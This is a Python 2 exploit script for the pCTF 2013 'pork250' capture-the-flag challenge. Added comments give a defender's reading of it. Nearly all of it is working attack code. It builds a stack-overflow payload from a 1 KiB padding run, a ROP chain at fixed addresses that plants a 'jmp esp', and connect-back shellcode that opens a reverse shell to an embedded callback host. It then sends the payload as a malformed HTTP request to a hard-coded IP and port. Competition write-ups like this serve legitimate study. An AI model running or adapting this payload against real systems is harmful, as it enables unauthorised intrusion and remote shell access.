## pCTF 2013
## pork250
## mak - DragonSector
#!/usr/bin/env python2
#
# Exploit write-up for the pCTF 2013 "pork250" challenge (Python 2: print
# statements, str payloads). Everything below is a single fixed payload sent
# to a hard-coded host/port.
#
# Defender's reading, limited to what this script shows:
#   * every gadget address is a fixed 0x0804xxxx value, so the chain only
#     lines up against a non-PIE binary loaded at the expected base;
#   * control goes through a "jmp esp" into shellcode carried in the request
#     itself, i.e. it depends on that stack memory being executable;
#   * the trigger is one HTTP request line whose URL is a 0x400-byte run of
#     "A" followed by raw binary and a bogus version token -- a request shape
#     that URL length limits at the parser, or an IDS rule on long
#     non-printable request lines, would catch.
import socket,time
from struct import *

#host = "localhost"
host = "54.235.20.205"   # challenge server; used by connect() below
junk = "A"*4             # 4-byte filler for gadget slots that are popped and discarded

## modified connect back
# Connect-back shellcode (author's description). The callback endpoint is
# embedded in these bytes -- "modified" presumably means it was patched in;
# confirm by disassembly. The repeated \xcd\x80 bytes are x86 Linux int 0x80
# system calls.
shellcode2 = (
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x5b\xe4\xc6\x61\x66\x68"
"\x1f\x90\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x30\x30\x73\x68\x89\xe6\xfe\x0e\xfe\x4c\x24\x01"
"\x68\x30\x62\x69\x6e\x89\xe6\xfe\x0e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0e\xfe\xc8\xfe\xc8\xfe\xc8\xcd\x80"
)

## write jmp esp @ 0x804ab72
# ROP chain. Per the author's per-gadget notes it loads eax from a fixed
# address, adds it into the dword at 0x804ab72 so that a "jmp esp" opcode ends
# up there, and finally returns into that address. The two large constants are
# the author's offset arithmetic for the odd [ebx +/- imm32] addressing of the
# gadgets; they are reproduced, not re-derived, here.
rop = pack('I',0x08049346) # pop ebx ; pop ebx ; ret
rop += pack('I',0x0B8A0008 + 0x80484af) # [shif - ptr] == 0xe500
rop += junk
rop += pack('I',0x080499ce) #add eax, dword [ebx-0x0B8A0008] ; add esp, 0x04 ; pop ebx ; pop ebp ; ret
rop += junk*3
rop += pack('I',0x08049346) # pop ebx ; pop ebx ; ret
rop += pack('i',0x804ab72-0x5D5B04C4) # [shif - ptr] == 0xffff0000   (packed signed: the difference is negative)
rop += junk
rop += pack('I',0x08048b3e) # add dword [ebx+0x5D5B04C4], eax ; ret
rop += pack('I',0x804ab72)  # return into the patched location

print "Shellcode lenght: %d" % len(shellcode2)

# Request line: "GET " + oversized URL + " H\r\n". The URL part carries the
# overflow padding, the stack-fixup/return addresses, the ROP chain and the
# shellcode in that order.
x = "GET http://"
x += "A"*0x400                        # overflow padding (1 KiB)
x += pack('I',0x080499a2) # fix esp
x +=("A"*4) + pack('I',0x0804a010) *2
x += "A"*32 #pack('I',0x804884a) *8 # ret nop
x += rop
x += shellcode2
x += " H\r\n"                         # " H" is not a valid HTTP version token

# Delivery: one TCP connection, payload sent with a plain send() (no check
# that the whole buffer was written), then trailing CRLFs after a pause --
# presumably to make the target finish reading the request -- and a long
# sleep to keep the socket open while the connect-back runs.
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,33227))
print "concectd to: %s" % host
s.send(x)
print "payload sended"
time.sleep(1)
s.send("\r\n"*100)
time.sleep(10)
#s.send(("A"*0x600) + ' http://asdf ' + "B"*0x100)
#print s.recv(0x1000)